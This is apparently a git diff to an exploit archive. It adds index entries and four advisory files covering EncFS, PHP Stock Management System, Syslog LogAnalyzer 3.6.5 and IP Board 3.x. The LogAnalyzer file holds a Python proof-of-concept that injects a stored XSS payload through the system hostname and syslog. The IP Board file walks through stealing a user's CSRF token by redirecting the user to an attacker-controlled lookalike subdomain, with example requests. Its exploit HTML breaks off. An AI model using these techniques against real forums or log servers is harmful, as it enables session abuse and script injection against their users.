diff --git a/files.csv b/files.csv index 9664682b4..c3d14d2b4 100755 --- a/files.csv +++ b/files.csv @@ -30990,6 +30990,7 @@ id,file,description,date,author,platform,type,port 34402,platforms/php/webapps/34402.txt,"OpenSolution Quick.Cart Local File Include and Cross Site Scripting Vulnerabilities",2009-10-08,kl3ryk,php,webapps,0 34403,platforms/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 USER Command Remote Buffer Overflow Vulnerability",2010-07-22,demonalex,windows,dos,0 34404,platforms/windows/dos/34404.pl,"K-Meleon 1.x URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,windows,dos,0 +34405,platforms/php/webapps/34405.txt,"PHP Stock Management System 1.02 - Multiple Persistent Cross Site Scripting Vulnerabilities",2014-08-25,"Ragha Deepthi K R",php,webapps,0 34408,platforms/multiple/webapps/34408.txt,"Innovaphone PBX Admin-GUI - CSRF Vulnerability",2014-08-25,"Rainer Giedat",multiple,webapps,80 34409,platforms/multiple/webapps/34409.rb,"ManageEngine Password Manager MetadataServlet.dat SQL Injection",2014-08-25,"Pedro Ribeiro",multiple,webapps,8020 34410,platforms/php/webapps/34410.txt,"PHPFinance 0.6 'group.php' SQL Injection and HTML Injection Vulnerabilities",2010-08-05,skskilL,php,webapps,0 @@ -31065,6 +31066,7 @@ id,file,description,date,author,platform,type,port 34485,platforms/php/webapps/34485.txt,"FreeSchool 'key_words' Parameter Cross Site Scripting Vulnerability",2009-10-14,"drunken danish rednecks",php,webapps,0 34486,platforms/php/webapps/34486.txt,"PHPCMS2008 'download.php' Information Disclosure Vulnerability",2009-10-19,Securitylab.ir,php,webapps,0 34487,platforms/php/webapps/34487.txt,"Facil Helpdesk kbase/kbase.php URI XSS",2009-08-07,Moudi,php,webapps,0 +34489,platforms/windows/local/34489.py,"HTML Help Workshop 1.4 - Local Buffer Overflow Exploit (SEH)",2014-08-31,mr.pr0n,windows,local,0 34492,platforms/asp/webapps/34492.txt,"Online Work Order Suite Lite Edition Multiple Cross Site Scripting Vulnerabilities",2009-08-10,Moudi,asp,webapps,0 34493,platforms/php/webapps/34493.txt,"PPScript 'shop.htm' SQL Injection Vulnerability",2009-08-03,MizoZ,php,webapps,0 34494,platforms/php/webapps/34494.txt,"ViArt Helpdesk products.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0 @@ -31084,6 +31086,7 @@ id,file,description,date,author,platform,type,port 34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 'register/next' SQL Injection Vulnerability",2010-08-23,Sweet,php,webapps,0 34510,platforms/linux/dos/34510.txt,"OraclMySQL <= 5.1.48 'LOAD DATA INFILE' Denial Of Service Vulnerability",2010-08-20,"Elena Stepanova",linux,dos,0 34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes (admin-ajax.php, img param) - Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 +34512,platforms/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling SEH Buffer Overflow",2014-09-01,k3170makan,windows,local,0 34513,platforms/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Stored XSS Vulnerability",2014-09-01,"Prakhar Prasad",multiple,webapps,0 34514,platforms/php/webapps/34514.txt,"WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload Vulnerability",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80 34517,platforms/windows/remote/34517.rb,"Wing FTP Server Authenticated Command Execution",2014-09-01,metasploit,windows,remote,5466 @@ -31094,6 +31097,7 @@ id,file,description,date,author,platform,type,port 34522,platforms/linux/dos/34522.txt,"Oracle MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service Vulnerability",2010-07-09,"Elena Stepanova",linux,dos,0 34523,platforms/multiple/remote/34523.txt,"Nagios XI 'users.php' SQL Injection Vulnerability",2010-08-24,"Adam Baldwin",multiple,remote,0 34524,platforms/php/webapps/34524.txt,"Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection",2014-09-02,"Claudio Viviani",php,webapps,80 +34525,platforms/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Stored XSS (Python Exploit)",2014-09-02,"Dolev Farhi",multiple,webapps,0 34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit",2014-09-03,D35m0nd142,php,webapps,80 34527,platforms/windows/webapps/34527.c,"Acunetix Web Vulnerability Scanner DLL Loading Arbitrary Code Execution Vulnerability",2010-08-25,Kolor,windows,webapps,0 34528,platforms/multiple/dos/34528.py,"Adobe Acrobat and Reader <= 9.3.4 'AcroForm.api' Memory Corruption Vulnerability",2010-08-25,ITSecTeam,multiple,dos,0 @@ -31104,6 +31108,7 @@ id,file,description,date,author,platform,type,port 34534,platforms/php/webapps/34534.txt,"TCMS Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 34536,platforms/php/webapps/34536.txt,"CompuCMS Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 +34537,platforms/linux/local/34537.txt,"EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation Weaknesses",2010-08-26,"Micha Riser",linux,local,0 34538,platforms/php/webapps/34538.txt,"Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability",2014-09-05,Hannaichi,php,webapps,80 34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Stored XSS",2014-09-05,"Fikri Fadzil",php,webapps,80 34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit",2014-09-05,"Robert Kugler",windows,dos,0 @@ -31117,3 +31122,17 @@ id,file,description,date,author,platform,type,port 34548,platforms/php/webapps/34548.txt,"Datemill photo_view.php return Parameter XSS",2009-09-10,Moudi,php,webapps,0 34549,platforms/php/webapps/34549.txt,"Datemill photo_search.php st Parameter XSS",2009-09-10,Moudi,php,webapps,0 34550,platforms/php/webapps/34550.txt,"Datemill search.php st Parameter XSS",2009-09-10,Moudi,php,webapps,0 +34551,platforms/php/webapps/34551.txt,"IP Board 3.x - CSRF Token hjiacking",2014-09-07,"Piotr S.",php,webapps,0 +34552,platforms/php/webapps/34552.txt,"LoadedCommerce7 - Systemic Query Factory Vulnerability",2014-09-07,Breaking.Technology,php,webapps,0 +34553,platforms/php/webapps/34553.txt,"Wordpress Like Dislike Counter 1.2.3 Plugin - SQL Injection Vulnerability",2014-09-07,Att4ck3r.ir,php,webapps,0 +34555,platforms/php/webapps/34555.txt,"PhpOnlineChat 3.0 - XSS",2014-09-07,"N0 Feel",php,webapps,0 +34558,platforms/php/webapps/34558.txt,"Amiro.CMS 5.8.4.0 Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0 +34559,platforms/php/webapps/34559.txt,"Rumba XML 2.4 'index.php' Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0 +34560,platforms/php/webapps/34560.html,"ArtGK CMS Cross Site Scripting and HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0 +34561,platforms/php/webapps/34561.txt,"KingCMS 0.6 'CONFIG[AdminPath]' Parameter Remote File Include Vulnerability",2009-09-07,Securitylab.ir,php,webapps,0 +34562,platforms/php/webapps/34562.txt,"AdaptBB 1.0 'q' Parameter Cross Site Scripting Vulnerability",2009-10-14,"drunken danish rednecks",php,webapps,0 +34563,platforms/php/webapps/34563.txt,"OneCMS 2.6.1 'index.php' Cross Site Scripting Vulnerability",2010-09-02,anT!-Tr0J4n,php,webapps,0 +34564,platforms/php/webapps/34564.txt,"CMS WebManager-Pro 'c.php' SQL Injection Vulnerability",2010-09-02,MustLive,php,webapps,0 +34565,platforms/php/webapps/34565.txt,"NuSOAP 0.9.5 'nusoap.php' Cross Site Scripting Vulnerability",2010-09-03,"Bogdan Calin",php,webapps,0 +34571,platforms/php/webapps/34571.py,"Joomla Spider Calendar <= 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0 +34572,platforms/php/webapps/34572.txt,"Wordpress Bulk Delete Users by Email Plugin 1.0 - CSRF",2014-09-08,"Fikri Fadzil",php,webapps,0 diff --git a/platforms/linux/local/34537.txt b/platforms/linux/local/34537.txt new file mode 100755 index 000000000..fc96cb579 --- /dev/null +++ b/platforms/linux/local/34537.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/42779/info + +EncFS is prone to design errors in its cryptographic implementation. + +Three flaws have been identified that contribute to a weakening of the protections provided under CBC/CFB cipher mode. + +Attackers may leverage these weaknesses to attack encrypted files through watermarking or other techniques. Successful attacks may disclose sensitive information. + +http://www.exploit-db.com/sploits/34537.tar.gz \ No newline at end of file diff --git a/platforms/multiple/webapps/34525.txt b/platforms/multiple/webapps/34525.txt new file mode 100755 index 000000000..d74e4c55c --- /dev/null +++ b/platforms/multiple/webapps/34525.txt @@ -0,0 +1,51 @@ +Vulnerability title: Syslog LogAnalyzer 3.6.5 Stored XSS +Author: Dolev Farhi +Contact: dolevf at yahoo dot com @dolevff +Application: LogAnalyzer 3.6.5 +Date: 8.2.2014 +Relevant CVEs: CVE-2014-6070 +Vulnerable version: <= 3.6.5 +Fixed version: 3.6.6 + +1. About the application +------------------------ +LogAnalyzer is a web interface to syslog and other network event data. +It provides easy browsing, analysis of realtime network events and +reporting services. + + +2. Vulnerabilities Descriptions: +----------------------------- +It was found that an XSS injection is possible on a syslog server +running LogAnalyzer version 3.6.5. +by changing the hostname of any entity logging to syslog server with +LogAnalyzer to , and sending an arbitrary +syslog message, a client-side script injection execution is possible. + + +4. proof of concept exploit +----------------------- +#!/usr/bin/python +# Exploit title = LogAnalyzer 3.5.6 Stored XSS injection +# Date: Sept 2014 +# CVE: 2014-6070 +# Tested on RHEL6.4 + +import os +import syslog + +hostname = os.uname()[1] +payload = "\"\"" + +print("+ Setting temporary hostname to " + payload + "...") +os.system("hostname " + payload) + +print("+ Injecting the syslog message...") +syslog.syslog("syslog xss injection") + +print("+ Check LogAnalyzer dashboard...") + +raw_input("+ Press [enter] to restore hostname...") +os.system("hostname " + "\"" + hostname + "\"") + +print("+ Hostname restored to " + hostname) diff --git a/platforms/php/webapps/34405.txt b/platforms/php/webapps/34405.txt new file mode 100755 index 000000000..7998ec1d1 --- /dev/null +++ b/platforms/php/webapps/34405.txt @@ -0,0 +1,19 @@ +?# Exploit Title: Multiple Persistent Cross Site Scripting Vulnerabilities +in PHP Stock Management System 1.02 +# Date: 25 Aug 2014 +# Exploit Author: ?Ragha Deepthi K R +# Vendor Homepage: ?http://www.posnic.com/? +# Software Link:? http://sourceforge.net/projects/stockmanagement/ +# Version: ?1.02 +# Tested on: Windows 7 + +################################################# +?PHP Stock Management System 1.02? is vulnerable for ?multiple Persistent +Cross Site Scripting Vulnerabilit?ies. +The vulnerability affects 'sname'(Store Name Field), 'address'(Address +Field), 'place'(Place Field), 'city'(City Field), pin(Pin Field), +website(Website Field), email(Email Field) parameter?s? while updating the +?store details in 'update_details.php' and when seen in 'view_report.php' + +################################################# +Greetz :? Syam !? diff --git a/platforms/php/webapps/34551.txt b/platforms/php/webapps/34551.txt new file mode 100755 index 000000000..620bb46b4 --- /dev/null +++ b/platforms/php/webapps/34551.txt @@ -0,0 +1,95 @@ +#Title: IP Board 3.x CSRF - Token hjiacking +#Date: 03.09.14 +#Version: <= 3.4.6 +#Vendor: invisionpower.com +#Author: Piotr S. +#Video-PoC: https://www.youtube.com/watch?v=G5P21TA4DjY + + +1) Introduction + +Latest and propabbly previous IPB verions suffers on vulnerability, which allows attacker to steal CSRF token of specific user. Function, which allows users to share forum links, does not properly sanitize user input. Mentioned token is attached in request as GET parameter, so it's able to obtain it if user will be redirected to evil domain. Using the token, it is able to perform various operations as demonstrated in attached video. + + +2) PoC + +Let's take a closer look at following url: + +http://community.invisionpower.com/index.php?sharelink=print;aHR0cDovL2NvbW11bml0eS5pbnZpc2lvbnBvd2VyLmNvbS9mb3J1bS5waHA/aWQ9MjMzNQ== + +At first glance you can notice b64 string, after decoding it, you may see following address: +http://community.invisionpower.com/forum.php?id=2334 + +In this case, user should be redirected to default domain of the forum - community.invisionpower.com; it is able to bypass protection in this redirect, by creating particular subdomain on attacker website. it needs to contain address of victim forum otherwise it won't work. + +Request: +GET /index.php?sharelink=print;aHR0cDovL2NvbW11bml0eS5pbnZpc2lvbnBvd2VyLmNvbS54b3JiLnBsL2V4cGxvaXQuaHRtbA== HTTP/1.1 +Host: community.invisionpower.com + +Response: +302 +Location: http://community.invisionpower.com.xorb.pl/exploit.html?forcePrint=1&_k=161cc4d2d5503fdb483979f9c164b4d3 + +Token is delivered as value of GET _k parameter. File to which user is redirected contains javascript, which grabs token that will be used in CSRF request. + + +3) Reproduction + +a) Create subdomain + +http://forum.victim_site.com.your_domain.pl + + +b) Then, create file exploit.html with this content: + + +
+ + + + + +